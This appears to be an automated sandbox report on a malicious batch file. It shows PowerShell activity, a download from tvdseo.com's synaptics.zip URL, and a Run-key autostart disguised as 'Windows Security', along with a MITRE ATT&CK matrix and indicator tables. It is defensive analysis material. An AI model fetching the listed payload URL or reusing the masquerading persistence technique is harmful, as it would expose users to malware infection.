      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid Accounts1
      Windows Management Instrumentation
      1
      Scripting
      1
      Exploitation for Privilege Escalation
      1
      Masquerading
      OS Credential Dumping1
      Security Software Discovery
      Remote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Command and Scripting Interpreter
      21
      Registry Run Keys / Startup Folder
      11
      Process Injection
      1
      Disable or Modify Tools
      LSASS Memory1
      Process Discovery
      Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      PowerShell
      1
      DLL Side-Loading
      21
      Registry Run Keys / Startup Folder
      21
      Virtualization/Sandbox Evasion
      Security Account Manager21
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      DLL Side-Loading
      11
      Process Injection
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture4
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets1
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562560 Sample: JDHh9P2IVM.bat Startdate: 25/11/2024 Architecture: WINDOWS Score: 88 27 tvdseo.com 2->27 31 Antivirus detection for URL or domain 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 Yara detected Powershell download and execute 2->35 37 2 other signatures 2->37 7 cmd.exe 1 2->7         started        9 explorer.exe 13 10 2->9         started        12 explorer.exe 1 2->12         started        signatures3 process4 signatures5 14 powershell.exe 14 28 7->14         started        18 powershell.exe 7->18         started        20 powershell.exe 7->20         started        23 9 other processes 7->23 39 Accesses ntoskrnl, likely to find offsets for exploits 9->39 process6 dnsIp7 29 tvdseo.com 104.21.81.137, 443, 49709 CLOUDFLARENETUS United States 14->29 41 Powershell creates an autostart link 14->41 43 Creates an autostart registry key pointing to binary in C:\Windows 18->43 25 C:\Users\user\AppData\...\WindowsSecurity.lnk, MS 20->25 dropped file8 signatures9

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      JDHh9P2IVM.bat24%ReversingLabsScript-BAT.Packed.Generic
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://tvdseo.com/file/synaptics.zip100%Avira URL Cloudphishing
      NameIPActiveMaliciousAntivirus DetectionReputation
      tvdseo.com
      104.21.81.137
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://tvdseo.com/file/synaptics.zipfalse
        • Avira URL Cloud: phishing
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        104.21.81.137
        tvdseo.comUnited States
        13335CLOUDFLARENETUSfalse
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1562560
        Start date and time:2024-11-25 18:00:08 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 40s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:23
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:JDHh9P2IVM.bat
        renamed because original name is a hash value
        Original Sample Name:e689601d502cc0cd8017f9d6953ce7e201b2dad42f679dc33afa673249ea1aa4.bat
        Detection:MAL
        Classification:mal88.troj.expl.evad.winBAT@26/16@1/1
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .bat
        • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtCreateFile calls found.
        • Report size getting too big, too many NtOpenFile calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtSetInformationFile calls found.
        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • VT rate limit hit for: JDHh9P2IVM.bat
        TimeTypeDescription
        12:01:10API Interceptor68x Sleep call for process: powershell.exe modified
        18:01:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Security C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk
        18:01:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Security C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        104.21.81.137document.lnk.download.lnkGet hashmaliciousUnknownBrowse
          Compilazione di video e immagini protetti da copyright.batGet hashmaliciousUnknownBrowse
            ZkHGQqVNJE.binGet hashmaliciousUnknownBrowse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              tvdseo.comdocument.lnk.download.lnkGet hashmaliciousUnknownBrowse
              • 104.21.81.137
              Compilazione di video e immagini protetti da copyright.batGet hashmaliciousUnknownBrowse
              • 104.21.81.137
              http://tvdseo.comGet hashmaliciousUnknownBrowse
              • 86.38.202.97
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CLOUDFLARENETUSdocument.lnk.download.lnkGet hashmaliciousUnknownBrowse
              • 104.21.81.137
              http://www.urbanerecycling.comGet hashmaliciousHTMLPhisher, TechSupportScamBrowse
              • 104.17.25.14
              https://clickme.thryv.com/ls/click?upn=u001.dxrPihnXBHUGsddmpkmwUOT9H2uuoftUJgS1ImyDp5PjZ7uor3Bx5LY8846lufrxOd-2B-2FCl5NSKC1v9uXskdIrA-3D-3DPV4X_Uxfyb-2FV90WCSGuHCd77YDe2QH-2FfxD2e5Op8ULStuWwSYUM08QLuqWk0rbdQO8p2GP5XR1Nwn9dFZi5DaOMyz92mdTvaHywQzrJIxcHTOEjrrUNll1a6cdLHKylkZo7LdScnRC-2F7iC6hnMEdduqsWXASxbd-2BZeaoWZvCDaIudlukgt9S3uZsKQeBP86XSjGCyt8CMjRvxL6j1Dyr0eym46qao7knFO6iIo9LZAeoxbyu5E6pzhyc9-2F2VP-2BlZM3Ea-2B-2FiBNpyPNxcoMEQ2om5Ig-2F7RZ8WTAt-2F5MxtsslPlJve5tzpsISP74pi-2B8USUpl-2BAaEmzHGUoeKWRMyxJH35FiSw-3D-3DGet hashmaliciousUnknownBrowse
              • 104.21.55.245
              Encrypt DOC2024.11.19.1983928 shared with you! (203 KB).msgGet hashmaliciousUnknownBrowse
              • 1.1.1.1
              AccountDocuments - christinal.docxGet hashmaliciousUnknownBrowse
              • 1.1.1.1
              https://ymcajeffco-my.sharepoint.com/:u:/g/personal/rcampbell_mtvernonymca_org/Eb_PxgSrk7VCrlppYfmkXowB9vCdCR2cgdVG8AQkH7BcbQ?e=b9efJ2Get hashmaliciousHTMLPhisherBrowse
              • 1.1.1.1
              Compilazione di video e immagini protetti da copyright.batGet hashmaliciousUnknownBrowse
              • 104.21.81.137
              file.exeGet hashmaliciousUnknownBrowse
              • 172.67.187.240
              https://protection.cloze.email/r/EKJc7NAc1aGPd0140vt6MnJzYkpI4pQCyldpUEBtdFT8T8dhNmmHodcXxvKddJW4AhfqaDIQj32BX0HxSGbmPeDqDQs/n/SlBNQ05FV1NMRVRURVI/y52l9ppb.r.ap-northeast-1.awstrack.me/L0/https:%2F%2Fcloudprotectionc5f91e84a2b3d9e748f2a1d9b7e5f0c4a2b3d9e7a5pages.dynamixs.workers.dev%2F/1/010601933048cf65-492c630f-d6b3-471e-a31f-bf186231f1e8-000000/SL9CcqykWh2mQIC7eGiOMwzMSpk=185Get hashmaliciousUnknownBrowse
              • 104.21.29.43
              http://ti-17-0.914trk.comGet hashmaliciousUnknownBrowse
              • 1.1.1.1
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              3b5074b1b5d032e5620f69f9f700ff0eCompilazione di video e immagini protetti da copyright.batGet hashmaliciousUnknownBrowse
              • 104.21.81.137
              https://eastmancuts.jimdosite.com/Get hashmaliciousUnknownBrowse
              • 104.21.81.137
              https://www.google.com/url?q=https://clickme.thryv.com/ls/click?upn%3Du001.3HlspJ5fg-2BP4CQkV7GSVhvWTpgC6w0k7sA8b2Z9JBYU9BEMXtqHWLHW9PPcpforJszQ3_jzclrAiO28PBUU1ZLf2yC1YJEF5Rt8zDnz4yKbEuFqXf3c0fVOhzL2fXxOYix3CjCrzlLwoIPSXb9PavK50mtpdK-2FWF7thydb3q6E5ptEQiOVUz527Ewi1t813S-2FHejAJLe09fD2VqgM8mtwuQZA9i83VLkCPF4iItCSPXKUpNgWQKWxjEO6jlBp5GYVLghrpKcDuea5GONmLMVlbh4fQe7dtjhTFxxxExxfN1kv5tnx1PPl9DjYIyE468wz1qa1Z-2FWJgZrJbIFEpqhd4o5tGGyUoiPcIot5l2j9dpjy7QKj99ZiCz-2BBLi5dHUIl8gC4RxZBl-2FMaH4IZlQyWpqM-2BtZ9uE3ezFUl2fORMwAp4lQk-3D%23Cjanetrosenbach@imageindustries.com&source=gmail-imap&ust=1733149343000000&usg=AOvVaw1uIAp-JnZbTlkY9Td9ZLJjGet hashmaliciousHTMLPhisherBrowse
              • 104.21.81.137
              RICHIESTA D'OFFERTA.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
              • 104.21.81.137
              Rooming list.jsGet hashmaliciousRemcosBrowse
              • 104.21.81.137
              https://vectaire.doclawfederal.com/uDLtT/Get hashmaliciousHTMLPhisherBrowse
              • 104.21.81.137
              https://pastebin.com/raw/0v6VhvpbGet hashmaliciousUnknownBrowse
              • 104.21.81.137
              DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
              • 104.21.81.137
              2ehwX6LWt3.exeGet hashmaliciousXWormBrowse
              • 104.21.81.137
              No context
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):2916
              Entropy (8bit):5.467317141616963
              Encrypted:false
              SSDEEP:48:4tAzsSU4MmTc4RfoUeCa+m9qr9t5/78NfpH4GxJZKaVEouYAgwd64rHLjtv2:mAzlHJTcIwLz9qrh7KfpRJ5Eo9Adrx2
              MD5:D89736C3B3D207E11AD61AADF2452EDF
